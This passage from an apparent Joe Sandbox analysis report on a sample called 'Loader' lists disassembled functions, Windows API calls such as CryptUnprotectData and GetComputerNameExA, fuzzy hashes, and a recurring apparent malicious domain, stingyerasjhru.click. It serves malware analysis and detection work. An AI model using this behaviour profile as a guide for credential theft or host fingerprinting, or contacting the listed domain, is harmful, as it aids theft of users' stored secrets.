K3E, xrefs: 0040E6D8
fo` , xrefs: 0040E53B
stingyerasjhru.click, xrefs: 0040E8CC
7, xrefs: 0040E567
?C*], xrefs: 0040E6EE
oE, xrefs: 0040E47A
&W-Q, xrefs: 0040E70F
_YUk, xrefs: 0040E55C

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: Uninitialize
String ID: K3E$&W-Q$7$?C*]$_YUk$fo` $oE$stingyerasjhru.click
API String ID: 3861434553-2320718889
Opcode ID: 701536bb2d1ec543a91e6a801cdfe4920f9a634efbefe8ee4d3aee0bab6216a4
Instruction ID: dc43b5a20f060efac2224dbc67faab96f555e2419eb3d1dcd562ba34628f3b78
Opcode Fuzzy Hash: 701536bb2d1ec543a91e6a801cdfe4920f9a634efbefe8ee4d3aee0bab6216a4
Instruction Fuzzy Hash: 6CB1027150C3C18BD3258F2AD4907EBBFE2ABE6308F688D6DD4C867282C7794506CB56

Function 004196A0 Relevance: 13.4, APIs: 4, Strings: 3, Instructions: 1159libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 0043C680: LdrInitializeThunk.NTDLL(0043F89E,00000002,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043C6AE

LoadLibraryExW.KERNEL32(1D802383,00000000,00000800), ref: 00419A43
LookupPrivilegeValueW.ADVAPI32(00000000,1D802383,?), ref: 00419B19
FreeLibrary.KERNEL32(?), ref: 00419BF6
FreeLibrary.KERNEL32(?), ref: 00419C5B

Strings

;:98, xrefs: 004196D5
;:98, xrefs: 00419B35
;:98, xrefs: 0041A2F1

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: Library$Free$InitializeLoadLookupPrivilegeThunkValue
String ID: ;:98$;:98$;:98
API String ID: 206308786-608591628
Opcode ID: c00713a351399c09a4409ec9ad8ab2b185c96f97666378763381d3422a103a89
Instruction ID: 20dcddc5602d4ad048146b56261b1f52b20bf37ad466c7f365113a58439c88ff
Opcode Fuzzy Hash: c00713a351399c09a4409ec9ad8ab2b185c96f97666378763381d3422a103a89
Instruction Fuzzy Hash: E98259746093405BE7208F24D8917ABBBE2EBD6714F18992DE4C587392D379DC82CB4B

Function 004227C0 Relevance: 12.7, APIs: 3, Strings: 4, Instructions: 431
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 00422883
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 004228EA

Strings

]I, xrefs: 00422C14
pq, xrefs: 00422805
Pj, xrefs: 00422CD2, 00422CD6
@P, xrefs: 00422C0C

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: @P$Pj$]I$pq
API String ID: 237503144-2599363960
Opcode ID: e239aa4a95ff57b576cd01c30de73f46c241d395860bed3c7043ce247567fecd
Instruction ID: 71a907800d894f88ba1bcd9300870bfbcbc0a57d33380a38f61f95972a31f3c0
Opcode Fuzzy Hash: e239aa4a95ff57b576cd01c30de73f46c241d395860bed3c7043ce247567fecd
Instruction Fuzzy Hash: D0D10FB06083109FD310DF29E99162BBBE0FF86314F054A6DE9D59B3A0D7B89905CB57

Function 00421A9F Relevance: 8.5, Strings: 6, Instructions: 956
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

}, xrefs: 00421C1D
;:98, xrefs: 00421AE0
}, xrefs: 00421CE4
stingyerasjhru.click, xrefs: 00421F8D
;:98, xrefs: 00422650
|wpq, xrefs: 00421EDA

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID: ;:98$;:98$stingyerasjhru.click$|wpq$}$}
API String ID: 0-2503221673
Opcode ID: fc97829492ef5a1bbadb1ae2cf36adcb21381e7223bc749dce3476e95c0759cb
Instruction ID: bfcda4fc78958a6423a0c8389ef30b1a46821ce83e665f29af7813df555f6f45
Opcode Fuzzy Hash: fc97829492ef5a1bbadb1ae2cf36adcb21381e7223bc749dce3476e95c0759cb
Instruction Fuzzy Hash: 07623275618350DFE314CF29D89176BB7E2EB96310F49893CE8859B3A1D7389805CB86

Function 0040CDF5 Relevance: 7.8, Strings: 6, Instructions: 280
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

|wpq, xrefs: 0040D0A6
stingyerasjhru.click, xrefs: 0040D186
R@IZ, xrefs: 0040CE98
RDAZ, xrefs: 0040CE8D
]JIZ, xrefs: 0040CEA3
MNZb, xrefs: 0040CF02

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID: MNZb$R@IZ$RDAZ$]JIZ$stingyerasjhru.click$|wpq
API String ID: 0-3882712551
Opcode ID: a3d295e4de677f5778693720a6860ed01dc2677b5911d9165943ced07ce48a97
Instruction ID: 6bcef89fab22a0be91c3f9a17b5d93c497e4fcc09e780d798163f71dcfc5c1fb
Opcode Fuzzy Hash: a3d295e4de677f5778693720a6860ed01dc2677b5911d9165943ced07ce48a97
Instruction Fuzzy Hash: 9581FDB054C3C18AD331CF24D5943EFBBE1EBA6344F188A6CD8D96B281C7790906CB96

Function 00408680 Relevance: 7.8, APIs: 5, Instructions: 253
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 004086A4
GetCurrentThreadId.KERNEL32 ref: 004086AE
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004087F3
GetForegroundWindow.USER32 ref: 004088C1
ExitProcess.KERNEL32 ref: 0040899A

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID:
API String ID: 4063528623-0
Opcode ID: 8cd03c9aebe90ec96d0acda4b507a42559c6704a5c62887d39afadd0e4775307
Instruction ID: ccd327b76600f316a802d86e88ae0a5f1c3465088a91ef0362b94d5ec249e6b1
Opcode Fuzzy Hash: 8cd03c9aebe90ec96d0acda4b507a42559c6704a5c62887d39afadd0e4775307
Instruction Fuzzy Hash: 9B714677F447090BC718AE69CD4636AB6C79BC9310F1A853DA985EB3D2FDB88C014789

Function 00418B32 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 211
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00418B78

Strings

L4, xrefs: 00418AE0
;:98, xrefs: 004189B5
L4, xrefs: 004189E5

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: CryptDataUnprotect
String ID: ;:98$L4$L4
API String ID: 834300711-169395199
Opcode ID: 1b7a2fb6dba432fb6ce72c8c75801ca01b980b67b4b405a52c79328edc1b9b37
Instruction ID: 0a5aaf2ac1193fa4db8f6bafd72326092417ecf968f37223863fcf32e38b92ef
Opcode Fuzzy Hash: 1b7a2fb6dba432fb6ce72c8c75801ca01b980b67b4b405a52c79328edc1b9b37
Instruction Fuzzy Hash: F55124346093508FD7748F28E8857AF77E2BB92318F15893DC8D997251DF3848868B86

Function 00432538 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemMetrics.USER32 ref: 00432583
GetSystemMetrics.USER32 ref: 00432592

Strings

, xrefs: 00432666

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: 375182f4c78399503ffa56f71cb2b893134d4bade9cce48f02d1f9fa4a337abe
Instruction ID: cbd2f91c6e7bccfd09645db563301c5a2dc48dfd55df8df2e1702483762c6b95
Opcode Fuzzy Hash: 375182f4c78399503ffa56f71cb2b893134d4bade9cce48f02d1f9fa4a337abe
Instruction Fuzzy Hash: 8E516FB4E142199FDB40EFACDA85A9EBBF0BB88300F114529E498E7350D774AD44CF96

Function 00420450 Relevance: 2.6, Strings: 2, Instructions: 119COMMON

Download Yara Rule

Strings

sa, xrefs: 004204B9
&2, xrefs: 004204C1

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID: &2$sa
API String ID: 0-4107202647
Opcode ID: 46ecec437e0597b443adb83a7556ffd458587901ad055bee4c8ca4e741694985
Instruction ID: 48d5fc48ca05be7950f03ce4e9563392a146bab8ca988be822cefd75bdadf585
Opcode Fuzzy Hash: 46ecec437e0597b443adb83a7556ffd458587901ad055bee4c8ca4e741694985
Instruction Fuzzy Hash: E82121657142118BC714EF38DC2267BB7E4EF92360F555A2DE492CB291FB38C800C79A

Function 00410D78 Relevance: 2.5, APIs: 1, Instructions: 952COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c774e2834ef6efbd23922a019a0a9966c2fe50317b4ef1ddf5f97c46753b741f
Instruction ID: c9d59ac26e7013e0449e48f1ca5cfa9e0e8c7b4477680cb95e27e7d750a1601a
Opcode Fuzzy Hash: c774e2834ef6efbd23922a019a0a9966c2fe50317b4ef1ddf5f97c46753b741f
Instruction Fuzzy Hash: 8282D675A04B408FD314DF39C885396BBE2AB99314F198A3ED5EBC77D1D638A845CB02

Function 0041929D Relevance: 1.7, APIs: 1, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8e88ab2615ab9d128d6009e8b7137caa7b7ac94efe7f81d6b0b7ced3008dcfe
Instruction ID: 07b57d452cf168f4f8e7bb98b8d614196ebb20eb4ab483c693a899930df0cd56
Opcode Fuzzy Hash: e8e88ab2615ab9d128d6009e8b7137caa7b7ac94efe7f81d6b0b7ced3008dcfe
Instruction Fuzzy Hash: A551F8B150C3429FD714CF24D4A16AFB7E1AF99314F14892EE4DA87392D634EC85CB46

Function 00415BB7 Relevance: 1.6, APIs: 1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db2fd1b08c4ef73b6cffe389b2b20944d74cd73a8be859c08301e725f3f0b126
Instruction ID: 2a9c54b3382e0200f9d3d862f724d9cd0d7902b3f2ff327f908a372fd7a8f8a8
Opcode Fuzzy Hash: db2fd1b08c4ef73b6cffe389b2b20944d74cd73a8be859c08301e725f3f0b126
Instruction Fuzzy Hash: E141D3B190C641DFC724CF28D4917EBBBE1ABD5314F54892EE0D987342E639E885CB86

Function 0043C680 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(0043F89E,00000002,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043C6AE

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 0043C943 Relevance: 1.4, Strings: 1, Instructions: 152COMMON

Download Yara Rule

Strings

@, xrefs: 0043CAAB

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 0b6793157d04601db4c10b6673c807c66360a9bf3393fdc6303ac6cd5aad9060
Instruction ID: 17d9e0fd99ced71ed9e3bde41cbfb5e4310ba1b6858c0277b5f4d97499ef8537
Opcode Fuzzy Hash: 0b6793157d04601db4c10b6673c807c66360a9bf3393fdc6303ac6cd5aad9060
Instruction Fuzzy Hash: B14123B59113118BDB24DF24C8927ABB7B1EF49304F18945ED886BB351D7789801CB99

Function 0042AE1D Relevance: 1.4, Strings: 1, Instructions: 122COMMON

Download Yara Rule

Strings

;:98, xrefs: 0042AE8F

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: InitializeThunk
String ID: ;:98
API String ID: 2994545307-152368606
Opcode ID: 24a80477aa382a62f4210ddd4f75b5cdb44d8503a87fd2c1e569ab589761bbe6
Instruction ID: ac84a51835b690dedaff18edfced9a70b225f25b84eff310572fca7130ed8c12
Opcode Fuzzy Hash: 24a80477aa382a62f4210ddd4f75b5cdb44d8503a87fd2c1e569ab589761bbe6
Instruction Fuzzy Hash: 3E318A742847524BD7148F25D8C1BB2BBA2EB53300F0D95BEC4C68B292D63C9817C729

Function 0042B66B Relevance: .2, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d621e1c4d4ac966b42549a1e1447afbd6a195117149e6954d9e0b16fcf2476b
Instruction ID: 62966320435e87aeb235ea281a8478b4287878e17be31bb355f6cb4874596792
Opcode Fuzzy Hash: 0d621e1c4d4ac966b42549a1e1447afbd6a195117149e6954d9e0b16fcf2476b
Instruction Fuzzy Hash: DC5136317057518FD7188B28D890263BBE2EFD6320B5D8A6EC1964F7D2C338E806D799

Function 0042B660 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a72924fa0aef9d971ed143c9146c968da883d9c09666bab5678f4fc21769217
Instruction ID: 3ed637b4dc2986f88705be734b29b6b2a2ce8135eef9c925d0643589607568d6
Opcode Fuzzy Hash: 9a72924fa0aef9d971ed143c9146c968da883d9c09666bab5678f4fc21769217
Instruction Fuzzy Hash: 4101D4242183D18BDB128F3990913327BA0EF13314B58549AC4D6DF397D724D502CB69

Function 0040BB49 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea52521d8585b467ac2567aea9b9f1dbb4d34ddaf940849f6c720ecf54530fd6
Instruction ID: 9506e49e94a3480182712f05826181e76c4c23759d8b3728f738625f502a090d
Opcode Fuzzy Hash: ea52521d8585b467ac2567aea9b9f1dbb4d34ddaf940849f6c720ecf54530fd6
Instruction Fuzzy Hash: DD01F936F412124BE718CF64CC917AEB362EBC5310F19C13ED51177291C7B86802868C

Function 0043C7F4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 0043C8A4

Strings

PSLM, xrefs: 0043C805

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: ForegroundWindow
String ID: PSLM
API String ID: 2020703349-3490872691
Opcode ID: d17aa40d1b5ccecf68c69e3162f5464a46b817d8645d8795cd70ee0713df063c
Instruction ID: fbf3916a822c5aef83fe6bc8121c5ef06820eb40b307e3d046c7c7840cde770b
Opcode Fuzzy Hash: d17aa40d1b5ccecf68c69e3162f5464a46b817d8645d8795cd70ee0713df063c
Instruction Fuzzy Hash: DCF027749000528FDF00EF68AC4A3BA33E0EB1A219F141C7AD14BE2291C27885018F19

Function 0042B305 Relevance: 3.1, APIs: 2, Instructions: 79COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32 ref: 0042B306
GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 0042B3B7

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: ComputerFreeLibraryName
String ID:
API String ID: 2904949787-0
Opcode ID: aeb56d120df572d0a2705e1f8ee3b7f92eb514697b0bd6caa423dde0963aca49
Instruction ID: d3cae323e07e06b5c01e82f0385368494965ffc0fdfc1e8f8ed08c37b90993c9
Opcode Fuzzy Hash: aeb56d120df572d0a2705e1f8ee3b7f92eb514697b0bd6caa423dde0963aca49
Instruction Fuzzy Hash: 50113435214B818BD720CB75DC14BA7BBE5EF46310F19882ED5DAC7391CB38A802CB28

Function 0040CD78 Relevance: 3.0, APIs: 2, Instructions: 35COMMON

Download Yara Rule

APIs

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CD8A
CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CDA2

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: 8e4b465f0e696d12a0cc1979272a33652f63729dff8492a5ee6ac831f02b0d9b
Instruction ID: 30e1982d8f4e2053215f1ca3b668570085850ca10af8fc8413d65f00a9a88e9b
Opcode Fuzzy Hash: 8e4b465f0e696d12a0cc1979272a33652f63729dff8492a5ee6ac831f02b0d9b
Instruction Fuzzy Hash: FAF0A5767C5310B7F67C07249D6BF1925125BC1F24F3A4329B7263E6E0C9E42501468C

Function 0042B3F2 Relevance: 1.6, APIs: 1, Instructions: 102COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 0042B4C9

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: 1c116944cb6288f7f3023eb83410161bab3497c6809ee9447dc1a6d79191d705
Instruction ID: 409c405d53bf95258bea6c82a37deeba6769f396c72862485e716adcf633dd66
Opcode Fuzzy Hash: 1c116944cb6288f7f3023eb83410161bab3497c6809ee9447dc1a6d79191d705
Instruction Fuzzy Hash: 5B2192352047518BD719CF25D8A0672BBE2FF97304B19859EC0D78B752CB38A846CB55

Function 0042B3ED Relevance: 1.6, APIs: 1, Instructions: 90COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 0042B4C9

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: 9c9166169faba489429aefb980ee5394d871875fd777178d088499351131be3c
Instruction ID: 6a7d8507080d5458e55a58bacb6976a464bfc74b10077fff0acaf8e9814da14c
Opcode Fuzzy Hash: 9c9166169faba489429aefb980ee5394d871875fd777178d088499351131be3c
Instruction Fuzzy Hash: 6621A2352047418BC719CF35D8A0663B7A2FF9A300B19859DC0D78B752CB38A886CB51

Function 0042A830 Relevance: 1.6, APIs: 1, Instructions: 79COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 0042B3B7

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: 745983e085da360698a1f76826e1debb89df562ed689eaa029085fb38e2de1a3
Instruction ID: 9d008ff02a4c2f1a96795975a1cf28f9f75e56796dc4922f000902c1bda0b622
Opcode Fuzzy Hash: 745983e085da360698a1f76826e1debb89df562ed689eaa029085fb38e2de1a3
Instruction Fuzzy Hash: 4F113831214B818BD720CB35D8107A7BBD1EF46310F59842ED5DAC7351CB399406CB24

Function 004360EB Relevance: 1.6, APIs: 1, Instructions: 74COMMON

Download Yara Rule

APIs

GetUserDefaultUILanguage.KERNELBASE ref: 00436135

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: DefaultLanguageUser
String ID:
API String ID: 95929093-0
Opcode ID: d897c574f32a5ba550f79b63f3b0d0cf438ad50a3d39c2dc108cdb5bcdd6240d
Instruction ID: f851d370d7e644f22e4a4b53e5f370e2c4d05da048dcdf518086029b30789e5f
Opcode Fuzzy Hash: d897c574f32a5ba550f79b63f3b0d0cf438ad50a3d39c2dc108cdb5bcdd6240d
Instruction Fuzzy Hash: 8C21E772D052A8CFDB248F789C853DD7BB15F59320F1A42AEC849BB386CA784D418F51

Function 0043C620 Relevance: 1.5, APIs: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,?,0040B67D,00000000,00000000), ref: 0043C652

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 65c52e7afab2ea9895ec623c07326861ba393e72b4bd7239f98d72508dbbccd2
Instruction ID: 3d4c23eb339db9dfa9da3606a127b5149aff1c7c6ec0ac71df25786042906406
Opcode Fuzzy Hash: 65c52e7afab2ea9895ec623c07326861ba393e72b4bd7239f98d72508dbbccd2
Instruction Fuzzy Hash: 87E09B76554611ABC6102F357C16F1B3664DFCF714F162C3AF44067111DA39E81186AF

Function 0042D4C8 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 0042D50E

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 438a52a7958d470ff716d772127d33d5a979f60480b183ba2e146c4ce516e4f2
Instruction ID: ec106bfa154cd3a6e2363df0bba870ff3029a76047e972c821c17a1dc406a7a9
Opcode Fuzzy Hash: 438a52a7958d470ff716d772127d33d5a979f60480b183ba2e146c4ce516e4f2
Instruction Fuzzy Hash: E501FFB46087018FD304DF24C594B5A7BF1FB85308F11885DE1958B394C7B5A949CF81

Function 00430360 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 004303AE

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 0eca9bbcc6a27c0ef14d982516248d3be7fa97c1cd161aeb6cb31cc2bc0333a4
Instruction ID: 99e05297ac493cd784d781e0af23b182a259bd718048770fef0d435df22bd7d7
Opcode Fuzzy Hash: 0eca9bbcc6a27c0ef14d982516248d3be7fa97c1cd161aeb6cb31cc2bc0333a4
